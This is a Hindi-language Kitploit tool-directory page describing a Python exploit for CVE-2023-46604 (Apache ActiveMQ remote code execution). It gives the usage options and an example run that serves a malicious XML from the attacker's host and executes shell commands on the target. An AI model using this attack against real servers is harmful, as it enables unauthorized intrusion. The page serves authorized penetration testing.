Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-46604-ActiveMQ-RCE-pseudoshell — यह स्क्रिप्ट CVE-2023046604 (Apache ActiveMQ) का उपयोग करके एक छद्म शेल उत्पन्न करती है। यह कमजोरी OpenWire प्रोटोकॉल के भीतर असुरक्षित डिसीरियलाइज़ेशन के कारण दूरस्थ कोड निष्पादन की अनुमति देती है। | Kitploit
उपकरण/GitHubGitHub/duck-sec/cve-2023-46604-activemq-rce-pseudoshell
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगरिमोट एक्सेस टूल
GitHubduck-sec/cve-2023-46604-activemq-rce-pseudoshell

CVE-2023-46604-ActiveMQ-RCE-pseudoshell

यह स्क्रिप्ट CVE-2023046604 (Apache ActiveMQ) का उपयोग करके एक छद्म शेल उत्पन्न करती है। यह कमजोरी OpenWire प्रोटोकॉल के भीतर असुरक्षित डिसीरियलाइज़ेशन के कारण दूरस्थ कोड निष्पादन की अनुमति देती है।

रिपॉजिटरी देखें
19622 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-46604 RCE स्यूडोशेल

यह स्क्रिप्ट CVE-2023046604 (Apache ActiveMQ) का उपयोग करके एक स्यूडो शेल उत्पन्न करता है। यह कमजोरी OpenWire प्रोटोकॉल में असुरक्षित डिसीरियलाइज़ेशन के कारण रिमोट कोड निष्पादन की अनुमति देती है।

विवरण

CVE-2023-46604 एक डिसीरियलाइज़ेशन कमजोरी है जो Apache ActiveMQ के OpenWire प्रोटोकॉल में मौजूद है। इस दोष का उपयोग करके एक हमलावर उस सर्वर पर मनमाना कोड निष्पादित कर सकता है जहाँ ActiveMQ चल रहा है। एक हमलावर एक दुर्भावनापूर्ण xml फ़ाइल बना सकता है, जिसके आदेश रिमोट सर्वर द्वारा निष्पादित किए जाएंगे।

यह एक्सप्लॉइट xml दस्तावेज़ निर्माण की प्रक्रिया को स्वचालित और सारगर्भित करता है, फ़ाइल वितरित करने के लिए एक बुनियादी सर्वर प्रदान करता है और POST के माध्यम से लक्ष्य सर्वर से जानकारी वापस प्राप्त करता है। यह रिवर्स शेल को आमंत्रित करने या बाइनरी तैनात करने की आवश्यकता के बिना निरंतर शोषण की अनुमति देता है।

पूर्वापेक्षाएँ

एक्सप्लॉइट स्क्रिप्ट चलाने से पहले, सुनिश्चित करें कि आपके पास:

  • आपके सिस्टम पर Python 3.x स्थापित हो।
  • कमजोर ActiveMQ सर्वर तक नेटवर्क पहुंच।
  • कमजोर सर्वर के विरुद्ध परीक्षण करने की अनुमति।

उपयोग

स्क्रिप्ट को आवश्यकता है:

  • ActiveMQ सर्वर IP या होस्टनाम
  • सर्व IP (आपके सिस्टम पर एक IP, जो लक्ष्य तक पहुँच योग्य हो।)

वैकल्पिक:

  • ActiveMQ सर्वर पोर्ट - डिफ़ॉल्ट 61616
  • सर्व पोर्ट (लोकल सर्वर शुरू करने के लिए पोर्ट) - डिफ़ॉल्ट 8080
root@kitploit:~
usage: exploit.py [-h] -i IP [-p PORT] -si SRVIP [-sp SRVPORT]

optional arguments:
  -h, --help            show this help message and exit
  -i IP, --ip IP        ActiveMQ Server IP or Hostname
  -p PORT, --port PORT  ActiveMQ Server Port, defaults to 61616
  -si SRVIP, --srvip SRVIP
                        Serve IP
  -sp SRVPORT, --srvport SRVPORT
                        Serve port, defaults to 8080

उदाहरण

root@kitploit:~
$python3 exploit.py -i 10.129.230.87 -p 61616  -si 10.10.14.59 -sp 8080
#################################################################################
#  CVE-2023-46604 - Apache ActiveMQ - Remote Code Execution - Pseudo Shell      #
#  Exploit by Ducksec, Original POC by X1r0z, Python POC by evkl1d              #
#################################################################################

[*] Target: 10.129.230.87:61616
[*] Serving XML at: http://10.10.14.59:8080/poc.xml
[!] This is a semi-interactive pseudo-shell, you cannot cd, but you can ls-lah / for example.
[*] Type 'exit' to quit

#################################################################################
# Not yet connected, send a command to test connection to host.                 #
# Prompt will change to Apache ActiveMQ$ once at least one response is received #
# Please note this is a one-off connection check, re-run the script if you      #
# want to re-check the connection.                                              #
#################################################################################

[Target not responding!]$ whoami
activemq

Apache ActiveMQ$ ls -lah
total 164K
drwxr-xr-x  5 activemq activemq 4.0K Nov  7 12:50 .
drwxr-xr-x 11 activemq activemq 4.0K Nov  6 01:18 ..
-rwxr-xr-x  1 activemq activemq  21K Apr 20  2021 activemq
-rwxr-xr-x  1 activemq activemq 6.1K Apr 20  2021 activemq-diag
-rw-r--r--  1 activemq activemq  17K Apr 20  2021 activemq.jar
-rw-r--r--  1 activemq activemq 5.5K Apr 20  2021 env
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-32
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 linux-x86-64
drwxr-xr-x  2 activemq activemq 4.0K Nov  5 00:13 macosx
-rw-r--r--  1 activemq activemq  82K Apr 20  2021 wrapper.jar

Apache ActiveMQ$ 

CVE-2023-46604-RCE.webm

श्रेय

यह एक्सप्लॉइट Go में X1r0z द्वारा मूल POC और evkl1d द्वारा Python POC पर आधारित है।

अस्वीकरण

यह कोड केवल शैक्षिक और नैतिक सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग जिम्मेदारी से और केवल उन वातावरणों में किया जाना चाहिए जहाँ स्पष्ट प्राधिकरण प्रदान किया गया हो। अनधिकृत या दुर्भावनापूर्ण उपयोग सख्त वर्जित है। इस कोड का उपयोग करके, आप अपने क्षेत्राधिकार में लागू सभी लागू कानूनों, विनियमों और नैतिक मानकों का पालन करने के लिए सहमत होते हैं। निर्माता और योगदानकर्ता इस कोड के दुरुपयोग या अनधिकृत उपयोग से उत्पन्न होने वाली किसी भी क्षति या परिणामों के लिए किसी भी देयता से इनकार करते हैं।

टूल डाउनलोड करें